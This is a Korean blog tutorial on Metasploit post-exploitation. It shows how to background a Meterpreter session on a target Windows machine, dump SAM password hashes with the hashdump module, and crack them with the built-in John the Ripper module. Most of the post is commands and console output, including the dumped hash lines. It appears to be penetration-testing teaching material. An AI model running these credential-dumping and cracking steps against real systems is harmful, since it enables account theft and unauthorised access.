[METASPLOIT] Metasploit 을 이용한 HashDump 및 Password Crack(John the Ripper)

by hahwul 3 min read

Metasploit 모듈 중 post/hashdump 와 john(john the ripper)를 통한 hash crack에 대한 이야기를 할까 합니다. 일단 meterpreter 쉘을 target pc 에 주입 및 구동하여 shell 연결을 유지합니다.

meterpreter > ls Listing: C:\Documents and Settings\LocalService\Cookies =======================================================

Mode Size Type Last modified Name —- —- —- ————- —- 100666/rw-rw-rw- 16384 fil 2015-08-13 12:28:33 +0900 index.dat

meterpreter >

POST/WINDOWS/GATHER/HASHDUMP 모듈을 이용한 SAM Dump

여기서 공격자는 POST 모듈을 사용하기 위해 metasploit 으로 돌아갑니다. background 명령을 사용하여 세션은 유지한 채 msf 로 돌아갈 수 있습니다.

meterpreter > background [*] Backgrounding session 1… hahwul exploit(handler) #> hahwul exploit(handler) #>

post 모듈 중 windows 의 hashdump 모듈을 이용하여 SAM 파일 덤프를 뜹니다.

hahwul exploit(handler) #> use post/windows/gather/hashdump hahwul post(hashdump) #> set session 1 session => 1 hahwul post(hashdump) #> run

[] Obtaining the boot key… [] Calculating the hboot key using SYSKEY cbda43cfe588e98549abf078ee086266… [] Obtaining the user list and keys… [] Decrypting user keys… [*] Dumping password hints…

No users with password hints on this system

[*] Dumping password hashes…

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:21ac9e2845f703fd49d14b2205b6cafe:658865617e824fc4be4ecd78969e89f4::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:ed4d8906fe997c250615fd2c9cac861c:::

[*] Post module execution completed

JOHN THE RIPPER 모듈을 이용한 PASSWORD CRACK

dump 된 파일이 메모리에 머무르고 있기 때문에 바로 john the ripper 모듈과 연동이 가능합니다. jtr 모듈 로드 후 바로 run 해줍니다.

hahwul post(hashdump) #> use auxiliary/analyze/jtr_crack_fast hahwul auxiliary(jtr_crack_fast) #> run

[] Wordlist file written out to /tmp/jtrtmp20150813-12465-1bewq4x [] Hashes Written out to /tmp/hashes_tmp20150813-12465-130ap5v [] Cracking lm hashes in normal wordlist mode… guesses: 0 time: 0:00:00:00 DONE (Thu Aug 13 14:14:32 2015) c/s: 4630K trying: ZITHER - TUDE [] Loaded 3 password hashes with no different salts (LM DES [128/128 BS SSE2-16]) [] Cracking lm hashes in single mode… guesses: 0 time: 0:00:00:06 DONE (Thu Aug 13 14:14:38 2015) c/s: 7793K trying: YB1900 - E1900 [] Loaded 3 password hashes with no different salts (LM DES [128/128 BS SSE2-16]) [] Cracking lm hashes in incremental mode (All4)… Warning: mixed-case charset, but the current hash type is case-insensitive; some candidate passwords may be unnecessarily tried more than once. guesses: 1 time: 0:00:00:03 DONE (Thu Aug 13 14:14:41 2015) c/s: 47858K trying: ||V} - |||} Warning: passwords printed above might be partial and not be all those cracked Use the “–show” option to display all of the cracked passwords reliably [] Loaded 3 password hashes with no different salts (LM DES [128/128 BS SSE2-16]) [] (guest) [] Cracking lm hashes in incremental mode (Digits)… Warning: MaxLen = 8 is too large for the current hash type, reduced to 7 guesses: 0 time: 0:00:00:00 DONE (Thu Aug 13 14:14:42 2015) c/s: 38986K trying: 9196448 - 9196495 [] Loaded 3 password hashes with no different salts (LM DES [128/128 BS SSE2-16]) [] Remaining 2 password hashes with no different salts [] Cracked Passwords this run: [+] guest::2 [+] administrator::1 [+] guest::2 [+] administrator::1 [] Cracking nt hashes in normal wordlist mode… guesses: 0 time: 0:00:00:00 DONE (Thu Aug 13 14:14:42 2015) c/s: 9719K trying: z - tude [] Loaded 3 password hashes with no different salts (NT MD4 [128/128 X2 SSE2-16]) [] Cracking nt hashes in single mode… guesses: 0 time: 0:00:00:13 DONE (Thu Aug 13 14:14:56 2015) c/s: 17243K trying: zwelithini1900 - tude1900 [] Loaded 3 password hashes with no different salts (NT MD4 [128/128 X2 SSE2-16]) [] Cracking nt hashes in incremental mode (Digits)… guesses: 0 time: 0:00:00:03 DONE (Thu Aug 13 14:14:59 2015) c/s: 88888K trying: 83536787 - 83536784 [] Loaded 3 password hashes with no different salts (NT MD4 [128/128 X2 SSE2-16]) [] Cracked Passwords this run: [*] Auxiliary module execution completed

별다른 정보가 나오지는 않았지만, Crack 이 된다면 아래와 같은 형태의 메시지를 받을 수 있습니다. [+] Cracked: Guest: [+] Cracked: TESTAAA:password

물론 직접 john 을 설치하여 crack도 가능하지만, metasploit 을 사용하여 테스트 시 위와 같은 방법이 더 편할거라 생각됩니다. :)